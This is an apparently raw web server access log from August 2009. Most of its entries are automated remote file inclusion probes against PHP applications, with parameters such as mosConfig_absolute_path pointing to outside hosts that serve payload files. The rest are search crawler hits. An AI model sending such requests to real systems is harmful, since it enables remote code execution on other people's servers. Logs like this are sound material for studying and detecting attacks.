67.205.67.241 - - [15/Aug/2009:20:12:37 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.medisite.fr/id??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
216.245.213.226 - - [15/Aug/2009:20:12:42 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:12:42 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:12:42 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:13:08 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
65.55.106.162 - - [15/Aug/2009:20:13:16 -0500] "GET /logs/access_log.1185840000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.187.200.218 - - [15/Aug/2009:20:14:15 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:14:15 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:14:16 -0500] "GET /logs/access_log.1241049600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:14:55 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:15:04 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
65.55.207.75 - - [15/Aug/2009:20:15:19 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.187.200.218 - - [15/Aug/2009:20:15:19 -0500] "GET /logs/access_log.1241049600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:15:19 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:15:20 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:15:51 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
66.244.128.29 - - [15/Aug/2009:20:17:14 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.medisite.fr/id??? HTTP/1.1" 404 348 "-""Avant Browser (http://www.avantbrowser.com)"
94.23.5.213 - - [15/Aug/2009:20:18:20 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.medisite.fr/id??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
93.187.200.218 - - [15/Aug/2009:20:21:39 -0500] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:39 -0500] "GET /logs/access_log.1245542400/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:39 -0500] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:40 -0500] "GET /logs/access_log.1245542400/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:41 -0500] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:41 -0500] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:20:21:44 -0500] "GET /logs/access_log.1245110400/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
212.114.13.126 - - [15/Aug/2009:20:23:06 -0500] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:23:06 -0500] "GET //modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:23:06 -0500] "GET /logs/access_log.1243641600//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:23:39 -0500] "GET /logs/access_log.1247875200//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
190.144.44.36 - - [15/Aug/2009:20:24:53 -0500] "GET /logs/scanhttp://www.aboutav.com//he.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
190.144.44.36 - - [15/Aug/2009:20:24:53 -0500] "GET /scanhttp://www.aboutav.com//he.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
190.144.44.36 - - [15/Aug/2009:20:31:05 -0500] "GET /logs/access_log.1243641600//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
190.144.44.36 - - [15/Aug/2009:20:31:05 -0500] "GET //modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
190.144.44.36 - - [15/Aug/2009:20:31:05 -0500] "GET /logs//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
190.144.44.36 - - [15/Aug/2009:20:31:30 -0500] "GET /logs/access_log.1247875200//modules/userstop/userstop.php?exbb[home_path]=http://post193.us/chid.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.55.207.46 - - [15/Aug/2009:20:35:26 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.46 - - [15/Aug/2009:20:36:47 -0500] "GET /logs/access_log.1220227200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.194.250.221 - - [15/Aug/2009:20:39:11 -0500] "GET //errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.194.250.221 - - [15/Aug/2009:20:39:11 -0500] "GET /logs/access_log.1229299200//errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.194.250.221 - - [15/Aug/2009:20:39:14 -0500] "GET /logs//errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.194.250.221 - - [15/Aug/2009:20:40:05 -0500] "GET /logs/access_log.1230595200//errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
91.194.250.221 - - [15/Aug/2009:20:40:05 -0500] "GET //errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
91.194.250.221 - - [15/Aug/2009:20:40:05 -0500] "GET /logs//errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
189.90.142.117 - - [15/Aug/2009:20:40:12 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:20:40:12 -0500] "GET /logs/access_log.1248134400//phpsecurityadmin/include/logout.php?PSA_PATH=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:20:40:12 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.194.250.221 - - [15/Aug/2009:20:40:30 -0500] "GET /logs/access_log.1229299200//errors.php?error=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.249.71.118 - - [15/Aug/2009:20:43:06 -0500] "GET /_vti_cnf/?M=A HTTP/1.1" 200 676 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
190.144.44.36 - - [15/Aug/2009:20:43:59 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://aboutav.com//o/id2.txt????? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
210.218.5.234 - - [15/Aug/2009:20:44:40 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:44:40 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:45:04 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:46:08 -0500] "GET /logs/access_log.1246406400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:46:08 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:46:08 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:46:55 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:46:55 -0500] "GET /logs/access_log.1246406400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:47:18 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:47:19 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:48:37 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:55:10 -0500] "GET /logs/access_log.1244505600/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:55:10 -0500] "GET /errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:55:10 -0500] "GET /logs/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:55:15 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:55:15 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.208.121 - - [15/Aug/2009:20:55:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [15/Aug/2009:20:55:32 -0500] "GET /logs/access_log.1140480000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [15/Aug/2009:20:55:32 -0500] "GET /logs/access_log.1146960000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.121 - - [15/Aug/2009:20:55:32 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.218.5.234 - - [15/Aug/2009:20:55:48 -0500] "GET /logs/access_log.1246406400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:20:56:51 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:00:05 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:00:20 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:00:20 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:00:42 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:00:42 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:01:01 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.194.250.221 - - [15/Aug/2009:21:01:47 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.194.250.221 - - [15/Aug/2009:21:01:47 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.194.250.221 - - [15/Aug/2009:21:01:47 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
210.218.5.234 - - [15/Aug/2009:21:02:30 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.98.136.21 - - [15/Aug/2009:21:02:58 -0500] "GET /logs/access_log.1241049600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.98.136.21 - - [15/Aug/2009:21:02:58 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
82.98.136.21 - - [15/Aug/2009:21:02:58 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:03:08 -0500] "GET /logs/access_log.1247356800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:03:08 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.207.52 - - [15/Aug/2009:21:03:16 -0500] "GET /logs/access_log.1173830400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.158.22.128 - - [15/Aug/2009:21:04:19 -0500] "GET /logs/access_log.1246233600//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:04:19 -0500] "GET /logs//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:04:19 -0500] "GET //viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:04:22 -0500] "GET /logs/access_log.1237593600//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:21:09:09 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:21:09:09 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:21:09:09 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:09:23 -0500] "GET /logs//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:09:23 -0500] "GET /logs/access_log.1246233600//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:09:23 -0500] "GET /logs/access_log.1237593600//viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.158.22.128 - - [15/Aug/2009:21:09:23 -0500] "GET //viewtopic.php?p=15&sid=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:21:09:35 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:10:07 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:10:14 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:10:14 -0500] "GET /logs/access_log.1246406400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
210.218.5.234 - - [15/Aug/2009:21:10:57 -0500] "GET /logs/access_log.1242086400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpitz.com//m1.gif?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:08 -0500] "GET //viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:08 -0500] "GET /logs/access_log.1246233600//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:08 -0500] "GET /logs/access_log.1237593600//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:08 -0500] "GET /logs//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:29 -0500] "GET //viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:31 -0500] "GET /logs/access_log.1246233600//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:31 -0500] "GET /logs//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:21:11:31 -0500] "GET /logs/access_log.1237593600//viewtopic.php?p=15&sid=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.107.181 - - [15/Aug/2009:21:17:46 -0500] "GET /logs/access_log.1224201600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.98.136.21 - - [15/Aug/2009:21:18:49 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
82.98.136.21 - - [15/Aug/2009:21:18:49 -0500] "GET /logs/access_log.1240790400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dm800.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [15/Aug/2009:21:20:10 -0500] "GET //main.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
211.202.2.220 - - [15/Aug/2009:21:20:10 -0500] "GET /logs//main.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.202.2.220 - - [15/Aug/2009:21:20:10 -0500] "GET /logs/access_log.1231200000//main.php?appserv_root=http://www.cpitz.com/m1.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:21:29:07 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:21:29:07 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:21:29:07 -0500] "GET /logs/access_log.1243209600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:21:30:10 -0500] "GET /logs/access_log.1240012800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.207.46 - - [15/Aug/2009:21:33:17 -0500] "GET /logs/access_log.1231372800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
